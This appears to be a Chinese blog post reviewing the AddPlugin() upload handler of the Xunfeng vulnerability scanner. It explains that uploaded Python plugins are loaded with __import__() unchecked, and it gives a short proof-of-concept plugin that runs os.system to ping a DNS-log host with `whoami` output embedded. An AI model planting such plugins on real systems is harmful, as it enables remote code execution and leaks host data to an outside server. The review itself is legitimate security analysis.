文件位置:view/view.py

AddPlugin()

# 新增插件异步

@app.route('/addplugin', methods=['get', 'post'])

@logincheck

@anticsrf

def AddPlugin():

    result = 'fail'

    f = request.files['file']

    isupload = request.form.get('isupload', 'false')

    file_name = ''

    if f:

        fname = secure_filename(f.filename)

        if fname.split('.')[-1] == 'py':

            path = file_path + fname

            if os.path.exists(file_path + fname):

                fname = fname.split('.')[0] + '_' + str(datetime.now().second) + '.py'

                path = file_path + fname

            f.save(path)

            if os.path.exists(path):

                file_name = fname.split('.')[0]

                module = __import__(file_name)

                mark_json = module.get_plugin_info()

                mark_json['filename'] = file_name

                mark_json['add_time'] = datetime.now()

                mark_json['count'] = 0

                if 'source' not in mark_json:

                    mark_json['source'] = 0

                insert_result = Mongo.coll['Plugin'].insert(mark_json)

                if insert_result:

                    result = 'success'

                    file_name = file_name +'.py'

    else:

        name = request.form.get('name', '')

        info = request.form.get('info', '')

        author = request.form.get('author', '')

        level = request.form.get('level', '')

        type = request.form.get('vultype', '')

        keyword = request.form.get('keyword', '')

        pluginurl = request.form.get('pluginurl', '')

        methodurl = request.form.get('methodurl', '')

        pdata = request.form.get('pdata', '')

        analyzing = request.form.get('analyzing', '')

        analyzingdata = request.form.get('analyzingdata', '')

        tag = request.form.get('tag', '')

        try:

            query = {'name': name, 'info': info, 'level': level, 'type': type, 'author': author, 'url': pluginurl,

                     'keyword': keyword, 'source': 0}

            query['plugin'] = {'method': methodurl.split(' ', 1)[0], 'url': methodurl.split(' ', 1)[1],

                               'analyzing': analyzing, 'analyzingdata': analyzingdata, 'data': pdata, 'tag': tag}

            file_name = secure_filename(name) + '_' + str(datetime.now().second) + ".json"

            with open(file_path + file_name, 'wb') as wt:

                wt.writelines(json.dumps(query))

            query.pop('plugin')

            query['add_time'] = datetime.now()

            query['count'] = 0

            query['filename'] = file_name

            insert_result = Mongo.coll['Plugin'].insert(query)

            if insert_result:

                result = 'success'

        except:

            pass

    if isupload == 'true' and result == 'success':

        code_tuple = open(file_path+file_name).read()

        code = ''

        for _ in code_tuple:

            code += _

        params = {'code': code}

        req = urllib2.Request('https://sec.ly.com/xunfeng/pluginupload')

        req.add_header('Content-Type','application/x-www-form-urlencoded')

        rsp = urllib2.urlopen(req,urlencode(params))

        print 'upload result:' + rsp.read()

    return result

先判断插件格式是json还是上传python文件

329-348行

python文件:利用secure_filename()函数来处理文件名。secure_filename()函数只返回ASCII字符,非ASCII字符会被过滤掉。判断是否py结尾, 文件是否存在,如果存在就重新命名。然后保存。

然后用__import__()加载这个文件, 获取到里面的get_plugin_info()的信息。我们编写插件的格式要有get_plugin_info()这个方法,返回插件信息。然后再加入了文件名 时间。保存到数据库。

由于使用了__import__() 可以动态加载文件,也没过滤。所以可以构造个代码执行,利用dnslog验证下。

import os;

def get_plugin_info():

    os.system("ping `whoami`.ip.port.xxx.ceye.io");

成功

351-379行

如果是json格式就接收传来的参数,然后插入到数据库里,并且写入到.json里文件里。

380-389行

如果有共享上传并且成功了,就向ysrc也发送一份poc...

巡风源码阅读与分析---AddPlugin()方法的更多相关文章

  1. 巡风源码阅读与分析---view.py

    巡风xunfeng----巡风源码阅读与分析 巡风是一款适用于企业内网的漏洞快速应急.巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果 ...

  2. 巡风源码阅读与分析---Aider.py

    之前写过一遍Aider.py,但只是跟着代码一顿阅读没有灵魂,所以重新对它阅读并重新写一遍. 描述 文件位置:aider/aider.py 是用来辅助验证的脚本 官方描述就一句话 代码阅读分析 这个脚 ...

  3. 巡风源码阅读与分析---nascan.py

    Nascan是巡风主要是做目标的资产识别(信息收集). nascan.py 文件位于 nascan/nascan.py # coding:utf-8 # author:wolf@YSRC import ...

  4. 巡风源码阅读与分析--querylogic函数

    文件位置:views/lib/QueryLogic.py Querylogic() # 搜索逻辑 def querylogic(list): query = {} if len(list) > ...

  5. HTTP请求库——axios源码阅读与分析

    概述 在前端开发过程中,我们经常会遇到需要发送异步请求的情况.而使用一个功能齐全,接口完善的HTTP请求库,能够在很大程度上减少我们的开发成本,提高我们的开发效率. axios是一个在近些年来非常火的 ...

  6. 如何实现一个HTTP请求库——axios源码阅读与分析 JavaScript

    概述 在前端开发过程中,我们经常会遇到需要发送异步请求的情况.而使用一个功能齐全,接口完善的HTTP请求库,能够在很大程度上减少我们的开发成本,提高我们的开发效率. axios是一个在近些年来非常火的 ...

  7. (3.4)mysql基础深入——mysql.server启动脚本源码阅读与分析

    (3.4)mysql基础深入——mysql.server启动脚本源码阅读与分析 my.server主要分为3大部分 [1]变量初始化部分 [2]函数声明部分 [3]具体执行部分 #!/bin/sh # ...

  8. ubuntu下linux内核源码阅读工具和调试方法总结

    http://blog.chinaunix.net/uid-20940095-id-66148.html 一 linux内核源码阅读工具 windows下当然首选source insight, 但是l ...

  9. python2.7-巡风源码阅读

    推荐个脚本示例网站:https://www.programcreek.com/python/example/404/thread.start_new_thread,里面可以搜索函数在代码中的写法,只有 ...

随机推荐

  1. java gui 2

    1,编写程序,随机生成两个数,用户输入两个数的和,并进行评判.程序的初始界面如下: 点击“获取题目”,随机生成两个100以内的int类型的数,界面如下: 提示: (1)使用java.util.Rand ...

  2. Asp.net core 启动流程

  3. [Linux][转载]Curl命令详解

    命令:curl 在Linux中curl是一个利用URL规则在命令行下工作的文件传输工具,是一款很强大的http命令行工具,当处在无界面的服务器上的时候,利用curl下载上传文件是较为方便的事情. 语法 ...

  4. Web程序-----批量生成二维码并形成一张图片

    需求场景:客户根据前台界面列表所选择的数据,根据需要的信息批量生成二维码并形成一张图片,并且每张图片显示的二维码数量是固定的,需要分页(即总共生成的二维码图片超出每页显示的需另起一页生成),并下载到客 ...

  5. Docker 学习6 Docker存储卷

    一.什么是存储卷 二.为什么要用到数据卷 三.数据卷是怎么被管理的 四.存储卷种类 五.在容器中使用存储卷 1.只声明容器路径 [root@localhost docker]# docker run ...

  6. P1113 杂务 拓扑排序

    题目描述 John的农场在给奶牛挤奶前有很多杂务要完成,每一项杂务都需要一定的时间来完成它.比如:他们要将奶牛集合起来,将他们赶进牛棚,为奶牛清洗乳房以及一些其它工作.尽早将所有杂务完成是必要的,因为 ...

  7. 2018-2019网络对抗技术 20165220 Exp4 恶意代码分析

    实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals,systracer套件. ...

  8. unity下贴图混合(Texture Blending)

    在unity制作自定义时,经常会遇到自定义妆容等问题,美术会提供大量的眉毛/胡子/腮红等贴图,来供用户选择. 美术给出的眉毛的小贴图如下: 在用户选用不同的胡子眉毛,可以将选定的小贴图和皮肤base贴 ...

  9. 2019北航oo课程第二单元作业总结..#_#..

    学习了之前在写代码是从来没有见过的多线程之后,便迎来了此次电梯作业.说实话,这次作业做得十分的辛苦,虽然在前三次作业中领悟到了java面向对象的精髓,但是再加上了多线程之后,又开始理不清思路,对自己的 ...

  10. 启动nginx报错问题

    为了解决生产环境的bug,模拟生产环境,我使用了nginx,在安装启动的过程中,出现了很多问题. 1.nginx下载地址 http://nginx.org/en/download.html 这是ngi ...